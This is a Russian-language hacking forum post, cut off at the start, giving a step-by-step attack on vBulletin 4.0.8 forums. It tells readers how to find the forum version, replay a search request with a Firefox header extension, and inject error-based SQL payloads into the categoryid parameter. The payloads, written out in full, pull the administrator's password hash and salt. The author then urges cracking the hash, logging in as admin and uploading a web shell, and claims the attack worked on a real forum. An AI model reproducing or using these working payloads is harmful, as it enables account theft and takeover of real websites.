подставив к ссылке форума
/clientscript/vbulletin_global.js
вот так например..
[Ссылки могут видеть только зарегистрированные пользователи. ]
вот и версия vBulletin 4.0.8
далее нам нужен Firefox и расширение в файрфоксе [Ссылки могут видеть только зарегистрированные пользователи. ]
для примера возьму все тот же
[Ссылки могут видеть только зарегистрированные пользователи. ]
как установили - заходим на форум
включаем расширение(инструменты - просмотр HTTP заголовков)
пишем любой запрос в поиске...
нам выдало
Код:
Извините, нет совпадений. Попробуйте указать другие ключевые слова.
ну или что-то нашло, без разницы
переходим в наше расширение , ищем POST запрос, он будет первый...
жмете на него и Повтор
редактируете его так, чтобы у вас остался только
securitytoken
в моем случае(я не авторизирован)
securitytoken=guest&
добавляем к нему
Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
должно быть так
Код:
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
вылазит ошибка, смотрим исходный код... внизу будет строка...
Ошибка MySQL : Duplicate entry 'b748e33ba276a9510af799c1fb6f0c79:1' for key 'group_key'
вот хеш b748e33ba276a9510af799c1fb6f0c79
теперь достаем соль...
к securitytoken добавляем
Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
выдало
Ошибка MySQL : Duplicate entry 'T`xnenL7XS|)!si5<BE@O^yu-vYG{0:1' for key 'group_key'
соль - T`xnenL7XS|)!si5&BE@O^yu-vYG{0
вроде все
выскакивает ошибка - в исходном коде будет Хеш пользователя с ID 1
у нас получилось
b748e33ba276a9510af799c1fb6f0c79:T`xnenL7XS|)!si5& BE@O^yu-vYG{0
хеш:соль юзера с ИД=1
т.е админа..
расшифровываем его и заходим за админа.. далее заливаем шелл...
тип хеша md5(md5($pass)$salt)
Работало на форуме 4game ;D
в запросе везде есть
userid=1
это ИД юзера чьего берем Хеш и соль...
меняйте если у админа ID не 1 или их несколько... будет больше шансов расшифровать...
извиняюсь что много буковок и нет скринов, если надо сделаю
вроде бы все расписал
как заливать шелл поищите в интернете
тренируйтесь
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]